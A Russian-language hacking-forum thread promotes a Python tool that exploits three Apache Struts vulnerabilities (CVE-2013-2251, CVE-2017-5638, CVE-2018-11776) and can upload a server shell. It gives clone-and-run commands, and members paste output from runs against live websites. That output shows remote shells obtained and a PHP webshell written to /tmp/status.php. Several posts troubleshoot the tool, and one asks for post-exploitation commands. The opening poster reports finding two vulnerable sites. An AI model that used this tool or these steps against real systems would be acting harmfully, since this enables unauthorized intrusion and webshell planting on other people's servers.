• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Soft Apache Struts v3 - Используем уязвимости.

Литиум

Литиум

Well-known member
13.12.2017
337
600
Всем привет. Представляю вам новинку. Она проверяет 3 уязвимости.
Страница разработчика -==
Разработчик -== s1kr10s

Введение.

Apache Struts v3 - Используем уязвимости.


Apache Struts v3 - Скрипт , который содержит набор из 3 уязвимостей:
Код:
1)CVE-2013-2251 'action:', 'redirect:' and 'redirectAction'
2)CVE-2017-5638 Content-Type
3)CVE-2018-11776 'redirect:' and 'redirectAction'
Также может создать серверную оболочку.

Проверяем сайты:
Код:
# python ApacheStruts.py
## <Сайт>
# HOST: https://codeby.net
1)
Screenshot from 2018-08-26 22-52-55.png

2)
Screenshot from 2018-08-26 22-57-17.png

Screenshot from 2018-08-26 22-57-24.png

3)
Screenshot from 2018-08-26 23-03-07.png

Screenshot from 2018-08-26 23-03-14.png

Подведем итоги:
Мне удалось найти 2 уязвимых сайта , новинка меня порадовала.
Данный скрипт будет полезен новичкам.
Используйте Apache Struts v3 для своих сайтах. Не нарушайте закон!


Код:
Установка и запуск:
# git clone https://github.com/s1kr10s/Apache-Struts-v3.git
# cd Apache-Struts-v3
# Запуск -== python ApacheStruts.py
#  HOST:  <Сайт>
Спасибо за внимание.
 
E

Elektrolife

Happy New Year
21.10.2016
216
33
В примере написано Что такое files.login ? Просто произвольная страница взятая для примера ?

У меня почему то нет надписи " upload shell "

[+] EJECUTANDO EXPLOIT 1
[-] NO VULNERABLE
[+] EJECUTANDO EXPLOIT 2
[-] VULNERABLE
[-] RUN EXPLOIT (s/n): s
[-] GET PROMPT...


Struts2@Shell_2:$

Шелл вроде как получил но на любые команды он выдаёт конфигурацию апача ( насколько я понял ) Я что то упустил ?
 
Литиум

Литиум

Well-known member
13.12.2017
337
600
В примере написано Что такое files.login ? Просто произвольная страница взятая для примера ?

У меня почему то нет надписи " upload shell "

[+] EJECUTANDO EXPLOIT 1
[-] NO VULNERABLE
[+] EJECUTANDO EXPLOIT 2
[-] VULNERABLE
[-] RUN EXPLOIT (s/n): s
[-] GET PROMPT...


Struts2@Shell_2:$

Шелл вроде как получил но на любые команды он выдаёт конфигурацию апача ( насколько я понял ) Я что то упустил ?
С данной проблемой не сталкивался , попробуйте на другом сайте. Если будет такая же проблема , постараюсь решить вашу проблему.
 
HakJob

HakJob

Well-known member
17.04.2018
240
163
Код:
 [+] EJECUTANDO EXPLOIT 1
   [-] VULNERABLE
   [-] RUN EXPLOIT (s/n): s
   [-] GET PROMPT...

   * [UPLOAD SHELL]
     Struts@Shell:$ pwnd (php)

Struts2@Shell_1:$ pwnd
path EJ:/tmp/: ls
Traceback (most recent call last):
  File "ApacheStruts.py", line 115, in <module>
    if espacio[1] == 'php':
IndexError: list index out of range
 
invetrika

invetrika

Active member
29.06.2018
42
18
Shell получается но вылазиет ошибка , открыл скрипт, посмотрел 115 строку на которую ругается, нихена не понял, решил написать сюда, как в целом эскплуатируется данная уязвимость, и что с ней можно сделать далее, после получения шеллов?
 
Литиум

Литиум

Well-known member
13.12.2017
337
600
Shell получается но вылазиет ошибка , открыл скрипт, посмотрел 115 строку на которую ругается, нихена не понял, решил написать сюда, как в целом эскплуатируется данная уязвимость, и что с ней можно сделать далее, после получения шеллов?
(115).
pathsave=raw_input("path EJ:/tmp/: ")
if espacio[1] == 'php':

Вы правы. Остается только ждать когда разработчик скрипта исправит ошибку. Возможно есть альтернативное решение проблемы. Сейчас разбираюсь.
IndexError: list index out of range

Shell получается но вылазиет ошибка , открыл скрипт, посмотрел 115 строку на которую ругается, нихена не понял, решил написать сюда, как в целом эскплуатируется данная уязвимость, и что с ней можно сделать далее, после получения шеллов?
Внимание! Скрипт перезалили!
Apache Struts v3 - Используем уязвимости.
 
Последнее редактирование:
HakJob

HakJob

Well-known member
17.04.2018
240
163
Перезалил себе скрипт - теперь на старте сразу ошибка )) Не обновляйтесь пока
 
  • Нравится
Реакции: Литиум
Литиум

Литиум

Well-known member
13.12.2017
337
600
Перезалил себе скрипт - теперь на старте сразу ошибка )) Не обновляйтесь пока
Это понятно , скрипт хороший , однако ждем когда все исправит и пользуемся на здоровье!;)
 
invetrika

invetrika

Active member
29.06.2018
42
18
Надо код поковырять)) посмотреть, а вдруг это кто то пытается Backdoor нам закинуть))) что бы следить за нами))
П - паранойя over100000000% )))
 
Литиум

Литиум

Well-known member
13.12.2017
337
600
Надо код поковырять)) посмотреть, а вдруг это кто то пытается Backdoor нам закинуть))) что бы следить за нами))
П - паранойя over100000000% )))
Вообще-то opensource , просто посмотри код , в противном случае администрация github давно бы удалила скрипт. К тому же , это его не первый проект.
 
  • Нравится
Реакции: DefWolf
invetrika

invetrika

Active member
29.06.2018
42
18
Вообще-то opensource , просто посмотри код , в противном случае администрация github давно бы удалила скрипт. К тому же , это его не первый проект.
Да я задуряюсь) Просто прочитал где то про внедрение бэкдоров в python скрипты) и всё, у меня началась паранойя)
 
  • Нравится
Реакции: Литиум
HakJob

HakJob

Well-known member
17.04.2018
240
163
у кого старая версия файла осталась - выложите плиз
 
D

Dinzex

Member
15.04.2018
23
7
Эх, знать бы команды для пост эксплуатации. ТС, дай знать как исправят ошибку. А за софт D A Y B O G Z D O R O V Y A
 
E

Elektrolife

Happy New Year
21.10.2016
216
33
Примерно вот какая хрень у меня постоянно:


[+] EJECUTANDO EXPLOIT 2
[-] VULNERABLE
[-] RUN EXPLOIT (s/n): s
[-] GET PROMPT...


Struts2@Shell_2:$ ls
censed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
*
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
-->

<!DOCTYPE html>
 
HakJob

HakJob

Well-known member
17.04.2018
240
163
так он вроде не показывает там уязвимостей
проверь на другом обьекте
 
HakJob

HakJob

Well-known member
17.04.2018
240
163
сорян, забыл что там минуса остаются
 
HakJob

HakJob

Well-known member
17.04.2018
240
163
Шел залит, но пути к нему не могу найти


Код:
[+] EJECUTANDO EXPLOIT CVE-2013-2251
   [-] VULNERABLE
   [-] RUN THIS EXPLOIT (s/n): s
   [-] GET PROMPT...

   * [UPLOAD SHELL]
     Struts@Shell:$ pwnd (php)

Struts2@Shell_1:$ pwnd php
path EJ:/tmp/: /tmp/

Create File Successfull :) [/tmp/status.php]
 
D

Dinzex

Member
15.04.2018
23
7
[+] EJECUTANDO EXPLOIT CVE-2013-2251
[-] VULNERABLE
[-] RUN THIS EXPLOIT (s/n): s
[-] GET PROMPT...

* [UPLOAD SHELL]
Struts@Shell:$ pwnd (php)

Struts2@Shell_1:$ pwnd php
path EJ:/tmp/: /tmp/

No Create File :/

Что не так, ребят?
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб